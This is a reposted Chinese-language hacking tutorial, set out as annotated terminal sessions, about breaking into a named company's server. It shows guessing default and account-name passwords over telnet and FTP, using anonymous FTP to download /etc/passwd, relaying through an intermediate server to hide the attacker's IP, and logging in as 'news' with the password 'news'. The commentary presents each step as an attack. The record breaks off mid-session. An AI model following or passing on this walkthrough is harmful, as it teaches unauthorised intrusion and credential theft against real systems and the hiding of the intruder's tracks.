转载:
>telnet www.fatman.com.tw (先用telnet过去)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: guest (先试一试guest这个公用帐号看看)
Password:
Login incorrect (阿~~不成功..没关.我再试)
fatman login: news
Password:
Connection closed by foreign host.
(哇~~才两次不成功就被赶出来了喔....这个系统还真狠..@&!J#~!)
> telnet www.fatman.com.tw (没关...再给它玩看看)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: fatman (骇客的第六感...)
Passwd:
Login incorrect
fatman login: system (这是系统的预设帐号...)
Passwd:
Login incorrect (看来已经被改过了..)
Connection closed by foreign host.
>ftp www.fatman.com.tw (改用ftp看看)
Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有够烂服务有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.
User (www.fatman.com.tw none)): fatman (还是一样试一下公司的名字)
331 Password required for fatman.
Password:
530 Login incorrect.(真失败~~今天运气好像不太好的样子)
Login failed.
ftp> user anonymous (用anonymous的公用帐号看看好了)
331 Guest login ok, send your complete e-mail address as password.
Password: (密码随便打..千万别傻到打真的e-mail..打qq@就好)
230 Guest login ok, access restrictions apply.
ftp>pwd
(终於进来了..好辛苦~~~..先看看自己在那个资料夹在说)
257 "/" is current directory.
ftp> ls -la
(寻找一下目标 /etc)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc
drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming
drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib
drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub
drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr
226 Transfer complete.
491 bytes received in 3.13 seconds (0.16 Kbytes/sec)
(嘻嘻....找到目标了..)
ftp> cd etc
(马上攻击进去)
250 CWD command successful. (嗯~可以进来...)
ftp> ls -la
(再看一下有没有我们要的密码档/etc/passwd)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
-rwxrwxr-x 1 root wheel 258 Dec 3 1993 group
-rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd
226 Transfer complete.
251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)
(不会吧...竟然那麽容易)
ftp> get passwd
(二话不说..马上抓密码档下来...呵呵.)
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (321 bytes).
226 Transfer complete.
5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)
ftp>bye
221 Goodbye.
(马上走人)
>cat passwd
(看一下刚才的密码档是....)
root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2 aemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0 perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
.
.
.
[以下省略]
(真衰..是shadow过的密码档....也难怪用anonymous就能抓下来..如果就只有这个的话
就无法解开密码了....但是可以从面的帐号知道fatman有提供那些服务.像是uucp .
mail . ftp . news ...operator是开机用的,所以没有用.daemon是用来分佩每一个帐号
的权限用的)
>rm passwd
(还是把它给消到好了...)
>^D
(好累..先讲到这吧...至少已经知道怎麽入侵到系统面了)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[休息时间]
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
嗯~~接著上次还没说完的话题..
上次是拿到了已经shadow过的/etc/passwd!!别以为它没有用喔...呵呵..虽然不能直接用
它还破解密码.但是它也为我们收集到一些系统的资讯..现在就在把它拿出来看看吧...
SunOS 5.6
login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.
(还是一样先连到中间伺服器,这样可以确保不在攻击的系统内留下自己的ip..别人也
就不能用逆流法来找了...但是中间伺服器是越多越好!!)
>who
(还是看一下安不安全)
judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)
(还是一样没人管)
>telnet www.fatman.com.tw
(攻击开始...)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login:nobody (先试一试被shadow过的密码档的帐号)
Password: (密码也打nobody...)
Login incorrect
fatman login:news (再试一下这个好了..)
Password: (也是news..)
Linux 2.0.29.
You have mail.
(呜哇啦!!!!进来了....千万别看别人的信喔..)
fatman:~$ cd /etc (看能不能进来)
fatman:/etc$ ls
(看一下...)
